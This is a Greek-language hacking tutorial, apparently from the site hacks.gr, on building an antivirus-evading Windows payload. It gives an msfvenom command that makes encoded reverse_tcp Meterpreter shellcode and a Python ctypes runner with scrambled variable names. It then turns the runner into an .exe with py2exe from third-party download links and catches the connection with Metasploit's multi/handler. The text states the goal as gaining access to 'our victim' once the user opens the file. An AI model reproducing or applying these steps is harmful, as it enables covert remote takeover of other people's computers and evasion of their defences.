Δημιουργία FUD Payload | Msfvenom + Metasploit + Python

windowshacking1

Αρχικά ανοίγουμε το τερματικό και γράφουμε >

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows -e x86/shikata_ga_nai -i 9 LHOST=$XXXX $ LPORT=XXXX -b '\x00\x0a\x0d\x40' -f c

Screenshot 9.png.40f094044d2627f050e3d8231e2e60e5

Στο windows/meterpreter/reverse_tcp στο -a x86 στο –platform Windows και στο LHOST + LPORT βάλτε τα δικά σας settings.. και τρέξτε το.

Θα σας κάνει generate το Shellcode..

Screenshot 10.png.3e945677c03f7d5684788f49681711d6

 

Τώρα τρέχουμε το compiler της Python.. και θα τρέξουμε τον παρακάτω κώδικα..

#!/usr/bin/python
# -*- conding: utf-8 -*-

from ctypes import *

AJhJAH8h7hhsfdfA = ("SHELLCODE HERE!");
ajsJABHSjajNJjNJ = create_string_buffer(AJhJAH8h7hhsfdfA, len(AJhJAH8h7hhsfdfA))
hshajIYReRyVSKsl = cast(ajsJABHSjajNJjNJ, CFUNCTYPE(c_void_p))

hshajIYReRyVSKsl()

Εκεί που έχω το SHELLCODE HERE! βάλτε το shellcode που έγινε generate από το msfvenom.. και κάντε το safe.

Κατεβάστε το py to exe για να κάνετε το .py αρχείο .exe http://www.mediafire.com/file/czq4t49g7qj94g8/py2exe-0.6.9.win32-py2.7.exe

Κατεβάστε το build αρχείο http://www.mediafire.com/file/4huv68a8t249bat/Build.rar

Τώρα περνάμε το αρχείο με το shellcode μέσα στο φάκελο build που μόλις κατεβάσατε..

Δείτε επίσης:   Τι χρειάζομαι για να κανω e-whoring

Screenshot 11.png.ccfd81bc2a619cf8d64e9f9d3e56d49b

 

Θα πρέπει να είναι κάπως έτσι.. πάμε στο καλό μέρος τώρα..

Ανοίγουμε το cmd στα win αφού έχουμε κάνει εγκατάσταση το py2exe και πάμε στην διαδρομή αυτή..

Screenshot 12.png.88faeec5d1982e453826e67bf36aa8ac

 

Και γράφουμε το παρακάτω command.. > c:\python27\python.exe build.py py2exe

Και μέσα στον φάκελο dist δημιουργήθηκε το κακόβουλο αρχείο.. (.exe)

Ανοίγουμε το Metasploit >

1) service postgresql start

2) msfconsole

Γράφουμε > use exploit/multi/handler

βάζουμε τα settings (show options)

και πατάμε exploit.. και πήραμε access στο θύμα μας (αφού άνοιξε το αρχείο ο χρήστης)

242546236 4526410447380695 8261268516492872656 n 1
Ο Αλέξανδρος είναι ο ιδρυτής του hacks.gr και η κινητήρια δύναμη πίσω από το όραμά μας. Με πολυετή εμπειρία στον κόσμο του hacking, έχει διαμορφώσει μια κοινότητα που είναι πηγή έμπνευσης και μάθησης για όλους. Με τον προσωπικό του χαρακτήρα και την τεχνογνωσία του, έχει δημιουργήσει έναν χώρο όπου οι λάτρεις του hacking μπορούν να συναντιούνται, να μοιράζονται γνώσεις και να εξελίσσονται.

Related Post

0 0 votes
Article Rating
Subscribe
Notify of
1 Comment
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Hacking

1
0
Would love your thoughts, please comment.x
()
x
Secured By miniOrange